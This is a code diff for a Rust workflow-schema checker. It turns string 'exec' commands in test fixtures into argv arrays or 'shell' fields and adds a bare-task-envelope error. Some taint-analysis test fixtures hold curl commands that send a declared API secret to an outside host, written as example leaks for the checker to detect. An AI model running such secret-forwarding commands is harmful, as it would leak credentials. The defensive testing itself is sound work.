     when: ${{ tasks.test.status == 'success' }}
-    exec: { command: \"./deploy.sh\" }
+    exec: { command: [\"./deploy.sh\"] }
 ";
         let errors = analyze_yaml(yaml).expect_err("no edge");
         assert_has(
@@ -287,7 +287,7 @@ tasks:
     invoke: { tool: \"nika:read\" }
   - id: process
     for_each: ${{ tasks.discover.output }}
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let errors = analyze_yaml(yaml).expect_err("no edge");
         assert_has(
@@ -308,9 +308,9 @@ nika: v1
 workflow: t
 tasks:
   - id: a
-    exec: { command: \"echo hi\" }
+    exec: { command: [\"echo\", \"hi\"] }
   - id: b
-    exec: { command: \"echo ${{ tasks.a.output }}\" }
+    exec: { command: [\"echo\", \"${{ tasks.a.output }}\"] }
 ";
         let errors = analyze_yaml(yaml).expect_err("no edge");
         let rendered = errors
@@ -338,7 +338,7 @@ nika: v1
 workflow: t
 tasks:
   - id: a
-    exec: { command: \"echo ${{ item }}\" }
+    exec: { command: [\"echo\", \"${{ item }}\"] }
 ";
         let errors = analyze_yaml(yaml).expect_err("loop-local out of scope");
         let rendered = errors
@@ -383,7 +383,7 @@ nika: v1
 workflow: t
 tasks:
   - id: test
-    exec: { command: \"cargo test\" }
+    exec: { command: [\"cargo\", \"test\"] }
     on_finally:
       - invoke:
           tool: nika:emit
@@ -475,7 +475,7 @@ workflow: t
 tasks:
   - id: go
     exec:
-      command: \"echo ${{ env.MISSING }} ${{ secrets.api_key }}\"
+      command: [\"echo\", \"${{ env.MISSING }}\", \"${{ secrets.api_key }}\"]
 ";
         let errors = analyze_yaml(yaml).expect_err("undeclared");
         assert_has(
@@ -517,7 +517,7 @@ nika: v1
 workflow: t
 tasks:
   - id: real
-    exec: { command: echo }
+    exec: { command: [echo] }
 outputs:
   result: ${{ tasks.ghost.output }}
 ";
@@ -611,7 +611,7 @@ tasks:
             "${{ vars.a + vars.b }}",          // arithmetic (outside the subset)
         ] {
             let yaml = format!(
-                "nika: v1\nworkflow: t\ntasks:\n  - id: go\n    when: {expr}\n    exec: {{ command: \"echo hi\" }}\n"
+                "nika: v1\nworkflow: t\ntasks:\n  - id: go\n    when: {expr}\n    exec: {{ command: [\"echo\", \"hi\"] }}\n"
             );
             let errors = analyze_yaml(&yaml).expect_err("grammar error");
             assert!(
@@ -723,7 +723,7 @@ workflow: t
 tasks:
   - id: go
     when: \"literal string\"
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let errors = analyze_yaml(yaml).expect_err("literal when");
         assert_has(
@@ -745,7 +745,7 @@ vars:
 tasks:
   - id: go
     when: ${{ vars.threshold }}
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let errors = analyze_yaml(yaml).expect_err("non-bool when");
         assert_has(
@@ -779,7 +779,7 @@ vars:
 tasks:
   - id: go
     when: ${{ vars.threshold > 0 }}
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         analyze_yaml(yaml).expect("comparison is boolean-shaped");
     }
@@ -794,10 +794,10 @@ workflow: t
 vars: { topic: \"x\" }
 tasks:
   - id: extract
-    exec: { command: echo }
+    exec: { command: [echo] }
   - id: report
     depends_on: [extarct]
-    exec: { command: \"echo ${{ vars.topci }} ${{ tasks.extract.output }}\" }
+    exec: { command: [\"echo\", \"${{ vars.topci }}\", \"${{ tasks.extract.output }}\"] }
 ";
         let errors = analyze_yaml(yaml).expect_err("typos");
         let rendered: Vec<String> = errors.iter().map(ToString::to_string).collect();
@@ -823,7 +823,7 @@ workflow: t
 vars: { topic: \"x\" }
 tasks:
   - id: a
-    exec: { command: \"echo ${{ vrs.topic }}\" }
+    exec: { command: [\"echo\", \"${{ vrs.topic }}\"] }
 ";
         let errors = analyze_yaml(yaml).expect_err("root typo");
         let rendered: Vec<String> = errors.iter().map(ToString::to_string).collect();
@@ -841,7 +841,7 @@ workflow: t
 vars: { topic: \"x\" }
 tasks:
   - id: a
-    exec: { command: \"echo ${{ vars.zzzzzzzzz }}\" }
+    exec: { command: [\"echo\", \"${{ vars.zzzzzzzzz }}\"] }
 ";
         let errors = analyze_yaml(yaml).expect_err("far typo");
         let rendered: Vec<String> = errors.iter().map(ToString::to_string).collect();
@@ -865,7 +865,7 @@ tasks:
   - id: a
     depends_on: [ghost]
     when: ${{ vars.nope }}
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let errors = analyze_yaml(yaml).expect_err("multi");
         assert!(errors.len() >= 3, "expected ≥3 errors, got {errors:?}");

--- a/crates/nika-schema/src/analyzer/scan.rs
+++ b/crates/nika-schema/src/analyzer/scan.rs
@@ -511,6 +511,17 @@ fn check_task_ref(
         errors.push(unresolved(&format!("tasks.{id}"), ctx, span, hint));
         return;
     }
+    if field.is_none() {
+        // 0.103 · #75 D2 — the envelope is not a value: the projection
+        // set is CLOSED and required (kills the #524 golden-drift class
+        // at the root · the pre-0.103 bare form denoted the whole record).
+        errors.push(SchemaError::BareTaskEnvelope {
+            task: id.to_owned(),
+            location: ctx.location.clone(),
+            span: Some(span),
+        });
+        return;
+    }
     if let Some(field) = field {
         let declared = index
             .bindings
@@ -602,7 +613,7 @@ mod tests {
             "{HEADER}tasks:
   - id: t
     with: {{ payload: [\"${{{{ vars.ghost }}}}\"] }}
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         assert_eq!(
@@ -623,7 +634,7 @@ mod tests {
             "{HEADER}tasks:
   - id: t
     with: {{ payload: {{ inner: \"${{{{ vars.ghost }}}}\" }} }}
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         assert_eq!(

--- a/crates/nika-schema/src/check/certificate.rs
+++ b/crates/nika-schema/src/check/certificate.rs
@@ -561,7 +561,7 @@ mod tests {
     #[test]
     fn plain_pipeline_has_exact_constant_bounds() {
         let c = cert(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n",
         ));
         assert_eq!(c.task_attempts, konst(2));
         assert_eq!(c.llm_calls, konst(0));
@@ -582,7 +582,7 @@ mod tests {
     #[test]
     fn literal_for_each_folds_into_the_constant() {
         let c = cert(&wf(
-            "  - id: a\n    for_each: [\"x\", \"y\", \"z\"]\n    retry: { max_attempts: 2 }\n    exec: { command: \"echo ${{ item }}\" }\n",
+            "  - id: a\n    for_each: [\"x\", \"y\", \"z\"]\n    retry: { max_attempts: 2 }\n    exec: { command: [\"echo\", \"${{ item }}\"] }\n",
         ));
         // 3 elements × 2 attempts
         assert_eq!(c.task_attempts, konst(6));
@@ -592,7 +592,7 @@ mod tests {
     #[test]
     fn expression_for_each_yields_a_parametric_term() {
         let c = cert(&wf(
-            "  - id: src\n    exec: { command: \"ls\" }\n  - id: fan\n    depends_on: [src]\n    for_each: ${{ tasks.src.output.files }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"summarize ${{ item }}\", max_tokens: 10 }\n",
+            "  - id: src\n    exec: { command: [\"ls\"] }\n  - id: fan\n    depends_on: [src]\n    for_each: ${{ tasks.src.output.files }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"summarize ${{ item }}\", max_tokens: 10 }\n",
         ));
         // src: 1 attempt · fan: 2·|fan| body runs
         assert_eq!(c.task_attempts.constant, 1);
@@ -630,7 +630,7 @@ mod tests {
     #[test]
     fn on_finally_counts_once_per_iteration_not_per_attempt() {
         let c = cert(&wf(
-            "  - id: a\n    retry: { max_attempts: 5 }\n    exec: { command: \"true\" }\n    on_finally:\n      - invoke: { tool: \"nika:log\", args: { message: \"done\" } }\n",
+            "  - id: a\n    retry: { max_attempts: 5 }\n    exec: { command: [\"true\"] }\n    on_finally:\n      - invoke: { tool: \"nika:log\", args: { message: \"done\" } }\n",
         ));
         // body: 5 attempts · cleanup: ONCE (after the terminal attempt)
         assert_eq!(c.task_attempts, konst(5));
@@ -641,7 +641,7 @@ mod tests {
     fn spend_axis_is_parametric_where_cost_says_unknown_iterations() {
         // the deepening: for_each-expression spend = a degree-1 term
         let c = cert(&wf(
-            "  - id: src\n    exec: { command: \"ls\" }\n  - id: fan\n    depends_on: [src]\n    for_each: ${{ tasks.src.output.files }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 200 }\n",
+            "  - id: src\n    exec: { command: [\"ls\"] }\n  - id: fan\n    depends_on: [src]\n    for_each: ${{ tasks.src.output.files }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 200 }\n",
         ));
         let usd = c.usd_micros.expect("priced");
         assert_eq!(usd.constant, 0);
@@ -673,7 +673,7 @@ mod tests {
     #[test]
     fn audit_accepts_honest_and_rejects_tampered_certificates() {
         let yaml = wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: fan\n    depends_on: [a]\n    for_each: ${{ tasks.a.output.items }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"x\", max_tokens: 50 }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: fan\n    depends_on: [a]\n    for_each: ${{ tasks.a.output.items }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"x\", max_tokens: 50 }\n",
         );
         let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let honest = certify(&parsed);
@@ -714,14 +714,14 @@ mod tests {
     fn span_is_the_longest_dependency_chain_in_attempts() {
         // chain a→b→c with retries: span = 1 + 3 + 2 = 6 = work
         let chain = cert(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    retry: { max_attempts: 3 }\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [b]\n    retry: { max_attempts: 2 }\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [b]\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(chain.span_attempts, 6);
         assert_eq!(chain.task_attempts, konst(6), "a pure chain: span == work");
 
         // diamond a→{b,c}→d: span = longest branch (1+3+1), work = sum
         let diamond = cert(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    retry: { max_attempts: 3 }\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [a]\n    exec: { command: \"true\" }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(diamond.span_attempts, 5, "longest branch: 1+3+1");
         assert_eq!(diamond.task_attempts, konst(6), "work: 1+3+1+1");
@@ -732,7 +732,7 @@ mod tests {
         // a for_each over 4 elements: work ×4, span unchanged (the
         // elements run in parallel — Brent: parallelism = work/span)
         let c = cert(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: fan\n    depends_on: [a]\n    for_each: [\"w\", \"x\", \"y\", \"z\"]\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: fan\n    depends_on: [a]\n    for_each: [\"w\", \"x\", \"y\", \"z\"]\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(c.task_attempts, konst(5), "work: 1 + 4");
         assert_eq!(c.span_attempts, 2, "span: 1 + 1 (elements parallel)");
@@ -741,7 +741,7 @@ mod tests {
     #[test]
     fn audit_catches_span_and_dep_tampering() {
         let yaml = wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n",
         );
         let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let honest = certify(&parsed);
@@ -884,7 +884,7 @@ mod tests {
     fn check_row_rejects_a_finally_llm_only_mismatch() {
         // task whose cleanup is an invoke → finally_effect=1, finally_llm=0
         let yaml = wf(
-            "  - id: a\n    exec: { command: \"true\" }\n    on_finally:\n      - invoke: { tool: \"nika:log\", args: { message: \"done\" } }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n    on_finally:\n      - invoke: { tool: \"nika:log\", args: { message: \"done\" } }\n",
         );
         let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let honest = certify(&parsed);
@@ -918,7 +918,7 @@ mod tests {
     #[test]
     fn finally_accumulators_sum_across_multiple_cleanups() {
         let yaml = wf(
-            "  - id: a\n    exec: { command: \"true\" }\n    on_finally:\n      - infer: { prompt: \"p1\", max_tokens: 10 }\n      - invoke: { tool: \"nika:log\", args: { message: \"m\" } }\n      - infer: { prompt: \"p2\", max_tokens: 10 }\n      - invoke: { tool: \"nika:emit\", args: { event: \"e\" } }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n    on_finally:\n      - infer: { prompt: \"p1\", max_tokens: 10 }\n      - invoke: { tool: \"nika:log\", args: { message: \"m\" } }\n      - infer: { prompt: \"p2\", max_tokens: 10 }\n      - invoke: { tool: \"nika:emit\", args: { event: \"e\" } }\n",
         );
         let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let honest = certify(&parsed);
@@ -945,7 +945,7 @@ mod tests {
         // main exec (free) + two priceable infer cleanups (100 tk each ·
         // $15/M = 1500 µ$ each → finally spend 3000 µ$)
         let yaml = wf(
-            "  - id: a\n    exec: { command: \"true\" }\n    on_finally:\n      - infer: { prompt: \"p1\", max_tokens: 100 }\n      - infer: { prompt: \"p2\", max_tokens: 100 }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n    on_finally:\n      - infer: { prompt: \"p1\", max_tokens: 100 }\n      - infer: { prompt: \"p2\", max_tokens: 100 }\n",
         );
         let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let honest = certify(&parsed);
@@ -993,7 +993,7 @@ mod tests {
     fn span_traverses_deps_declared_after_their_dependents() {
         // c → b → a, written c first: forces the push branch to matter
         let c = cert(&wf(
-            "  - id: c\n    depends_on: [b]\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"true\" }\n  - id: a\n    exec: { command: \"true\" }\n",
+            "  - id: c\n    depends_on: [b]\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: a\n    exec: { command: [\"true\"] }\n",
         ));
         // chain of 3 single-attempt tasks → span = 1+1+1 = 3
         assert_eq!(
@@ -1013,7 +1013,7 @@ mod tests {
         // a depends on b, b depends on a — a cycle (conformance rejects it
         // elsewhere; span must still TERMINATE with a finite value)
         let c = cert(&wf(
-            "  - id: a\n    depends_on: [b]\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    depends_on: [b]\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n",
         ));
         // with the cut, each node's chain stops at the visiting mark:
         // span = 1 + 1 = 2 (one hop before the back-edge is cut). The key

--- a/crates/nika-schema/src/check/cost.rs
+++ b/crates/nika-schema/src/check/cost.rs
@@ -353,7 +353,7 @@ nika: v1
 workflow: noinfer
 tasks:
   - id: sh
-    exec: { command: \"true\" }
+    exec: { command: [\"true\"] }
   - id: tool
     invoke: { tool: \"nika:read\", args: { path: \"x\" } }
 ",
@@ -389,7 +389,7 @@ tasks:
     #[test]
     fn when_gated_task_zeroes_the_cheapest_path() {
         let c = ceiling_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: t\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    infer: { prompt: \"x\", max_tokens: 1000 }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n  - id: t\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    infer: { prompt: \"x\", max_tokens: 1000 }\n",
         );
         assert!(c.tasks[0].gated);
         assert_eq!(c.tasks[0].min_path_usd, Some(0.0), "gate closed → $0");

--- a/crates/nika-schema/src/check/declass.rs
+++ b/crates/nika-schema/src/check/declass.rs
@@ -391,7 +391,7 @@ secrets:
         host: \"api.x.com\"
 tasks:
   - id: t
-    exec: { command: \"curl -d ${{ secrets.k }} api.x.com\" }
+    exec: { command: [\"curl\", \"-d\", \"${{ secrets.k }}\", \"api.x.com\"] }
 ";
         assert!(!sanctioned(y, "k", "t"), "fetch clearance ≠ exec clearance");
     }

--- a/crates/nika-schema/src/check/flow.rs
+++ b/crates/nika-schema/src/check/flow.rs
@@ -553,7 +553,7 @@ mod tests {
     #[test]
     fn direct_secret_into_exec_is_effect_tainted() {
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: t\n    exec: {{ command: \"curl -H ${{{{ secrets.api_key }}}}\" }}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: t\n    exec: {{ shell: \"curl -H ${{{{ secrets.api_key }}}}\" }}\n"
         );
         let (wf, f) = facts(&y);
         assert!(f.effect_taint(idx(&wf, "t")).is_some());
@@ -572,12 +572,12 @@ mod tests {
         use std::fmt::Write as _;
         const N: usize = 3_000;
         let mut y = format!("nika: v1\nworkflow: w\n{S}tasks:\n");
-        y.push_str("  - id: t0\n    exec: { command: \"echo ${{ secrets.api_key }}\" }\n");
+        y.push_str("  - id: t0\n    exec: { command: [\"echo\", \"${{ secrets.api_key }}\"] }\n");
         for k in 1..N {
             let p = k - 1;
             write!(
                 y,
-                "  - id: t{k}\n    depends_on: [t{p}]\n    exec: {{ command: \"echo ${{{{ tasks.t{p}.output }}}}\" }}\n"
+                "  - id: t{k}\n    depends_on: [t{p}]\n    exec: {{ shell: \"echo ${{{{ tasks.t{p}.output }}}}\" }}\n"
             )
             .expect("write to String is infallible");
         }
@@ -602,7 +602,7 @@ mod tests {
         // The false negative the review found: with: { tok: secret } then
         // ${{ with.tok }} into exec — one hop the old substring scan missed.
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: t\n    with: {{ tok: \"${{{{ secrets.api_key }}}}\" }}\n    exec: {{ command: \"curl -H ${{{{ with.tok }}}}\" }}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: t\n    with: {{ tok: \"${{{{ secrets.api_key }}}}\" }}\n    exec: {{ shell: \"curl -H ${{{{ with.tok }}}}\" }}\n"
         );
         let (wf, f) = facts(&y);
         let trace = f
@@ -621,7 +621,7 @@ mod tests {
         // A cleanup exec that sees a secret re-emits it like a main effect —
         // and a cleanup ALWAYS runs (the review's PROVEN blind spot).
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: t\n    exec: {{ command: \"echo build\" }}\n    on_finally:\n      - exec: {{ command: \"curl -d ${{{{ secrets.api_key }}}} x\" }}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: t\n    exec: {{ command: [\"echo\", \"build\"] }}\n    on_finally:\n      - exec: {{ shell: \"curl -d ${{{{ secrets.api_key }}}} x\" }}\n"
         );
         let (wf, f) = facts(&y);
         assert!(
@@ -644,7 +644,7 @@ mod tests {
         // a leaks secret into its exec → a.output tainted → b consuming
         // a.output into ITS exec is also tainted (transitive, via the DAG).
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    exec: {{ command: \"echo ${{{{ secrets.api_key }}}}\" }}\n  - id: b\n    depends_on: [a]\n    exec: {{ command: \"echo ${{{{ tasks.a.output }}}}\" }}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    exec: {{ shell: \"echo ${{{{ secrets.api_key }}}}\" }}\n  - id: b\n    depends_on: [a]\n    exec: {{ shell: \"echo ${{{{ tasks.a.output }}}}\" }}\n"
         );
         let (wf, f) = facts(&y);
         let tb = f.effect_taint(idx(&wf, "b")).expect("transitive taint");
@@ -662,7 +662,7 @@ mod tests {
         // a third-party provider) — but the model's RESPONSE is NOT tainted
         // (not a verbatim echo · the OUTPUT carve-out is preserved · ADR-092).
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    infer: {{ prompt: \"use ${{{{ secrets.api_key }}}}\", max_tokens: 10 }}\n  - id: b\n    depends_on: [a]\n    exec: {{ command: \"echo ${{{{ tasks.a.output }}}}\" }}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    infer: {{ prompt: \"use ${{{{ secrets.api_key }}}}\", max_tokens: 10 }}\n  - id: b\n    depends_on: [a]\n    exec: {{ shell: \"echo ${{{{ tasks.a.output }}}}\" }}\n"
         );
         let (wf, f) = facts(&y);
         // The prompt is now a sink (an unsanctioned provider egress · leak).
@@ -787,7 +787,7 @@ tasks:
     fn secret_reaching_outputs_is_an_egress() {
         // a secret leaving the run as the return value — the literal exfil.
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    exec: {{ command: \"echo ${{{{ secrets.api_key }}}}\" }}\noutputs:\n  leaked: ${{{{ tasks.a.output }}}}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    exec: {{ shell: \"echo ${{{{ secrets.api_key }}}}\" }}\noutputs:\n  leaked: ${{{{ tasks.a.output }}}}\n"
         );
         let (_wf, f) = facts(&y);
         let eg = f.egresses();
@@ -801,7 +801,7 @@ tasks:
         // for_each over a tainted upstream output → item is tainted → an
         // exec using ${{ item }} re-emits it.
         let y = format!(
-            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    exec: {{ command: \"echo ${{{{ secrets.api_key }}}}\" }}\n  - id: b\n    depends_on: [a]\n    for_each: ${{{{ tasks.a.output }}}}\n    exec: {{ command: \"echo ${{{{ item }}}}\" }}\n"
+            "nika: v1\nworkflow: w\n{S}tasks:\n  - id: a\n    exec: {{ shell: \"echo ${{{{ secrets.api_key }}}}\" }}\n  - id: b\n    depends_on: [a]\n    for_each: ${{{{ tasks.a.output }}}}\n    exec: {{ shell: \"echo ${{{{ item }}}}\" }}\n"
         );
         let (wf, f) = facts(&y);
         assert!(
@@ -812,7 +812,7 @@ tasks:
 
     #[test]
     fn no_secrets_declared_is_empty() {
-        let y = "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n";
+        let y = "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"echo\", \"hi\"] }\n";
         let (_wf, f) = facts(y);
         assert!(f.effect_taint(0).is_none());
         assert!(f.egresses().is_empty());

--- a/crates/nika-schema/src/check/hints.rs
+++ b/crates/nika-schema/src/check/hints.rs
@@ -724,7 +724,7 @@ mod tests {
     #[test]
     fn plain_success_gate_on_unskippable_dep_is_redundant() {
         let h = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { shell: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    exec: { shell: \"true\" }\n",
         );
         assert!(
             h.iter()
@@ -738,14 +738,14 @@ mod tests {
         // a may be skipped two ways — when:-gated · on_error: skip —
         // the spec's own « meaningful only when X may be skipped »
         let gated = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nvars: { go: \"y\" }\ntasks:\n  - id: root\n    exec: { command: \"true\" }\n  - id: a\n    depends_on: [root]\n    when: ${{ vars.go == 'y' }}\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nvars: { go: \"y\" }\ntasks:\n  - id: root\n    exec: { shell: \"true\" }\n  - id: a\n    depends_on: [root]\n    when: ${{ vars.go == 'y' }}\n    exec: { shell: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    exec: { shell: \"true\" }\n",
         );
         assert!(
             !gated.iter().any(|x| x.kind == "redundant-gate"),
             "{gated:?}"
         );
         let skip_route = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n    on_error: { skip: true }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { shell: \"true\" }\n    on_error: { skip: true }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' }}\n    exec: { shell: \"true\" }\n",
         );
         assert!(
             !skip_route.iter().any(|x| x.kind == "redundant-gate"),
@@ -758,21 +758,21 @@ mod tests {
         // conjunct = a condition beyond the default gate; reversed
         // operand IS the same plain gate; 'failure' is not the pattern
         let compound = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nvars: { env: \"p\" }\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && vars.env == 'p' }}\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nvars: { env: \"p\" }\ntasks:\n  - id: a\n    exec: { shell: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && vars.env == 'p' }}\n    exec: { shell: \"true\" }\n",
         );
         assert!(
             !compound.iter().any(|x| x.kind == "redundant-gate"),
             "{compound:?}"
         );
         let reversed = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ 'success' == tasks.a.status }}\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { shell: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ 'success' == tasks.a.status }}\n    exec: { shell: \"true\" }\n",
         );
         assert!(
             reversed.iter().any(|x| x.kind == "redundant-gate"),
             "{reversed:?}"
         );
         let failure = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'failure' }}\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    exec: { shell: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'failure' }}\n    exec: { shell: \"true\" }\n",
         );
         assert!(
             !failure.iter().any(|x| x.kind == "redundant-gate"),
@@ -791,7 +791,7 @@ mod tests {
     #[test]
     fn unconsumed_infer_is_dead_spend() {
         let h = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    exec: { command: \"echo done\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    exec: { shell: \"echo done\" }\n",
         );
         assert!(h.iter().any(|x| x.kind == "dead-spend" && x.task == "a"));
         // consumed via outputs: → no dead-spend hint
@@ -825,7 +825,7 @@ mod tests {
         );
         // A bare envelope in a GATE is plumbing, not a trap — silent.
         let gate = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    depends_on: [a]\n    when: ${{ size(tasks.a.output) > 0 }}\n    exec: { command: \"echo go\" }\noutputs:\n  r: ${{ tasks.a.output }}\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    depends_on: [a]\n    when: ${{ size(tasks.a.output) > 0 }}\n    exec: { shell: \"echo go\" }\noutputs:\n  r: ${{ tasks.a.output }}\n",
         );
         assert!(
             !gate.iter().any(|x| x.kind == "envelope-output"),
@@ -836,7 +836,7 @@ mod tests {
     #[test]
     fn deeply_referenced_unschema_d_output_gets_a_typing_hint() {
         let h = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.field }}\" }\n",
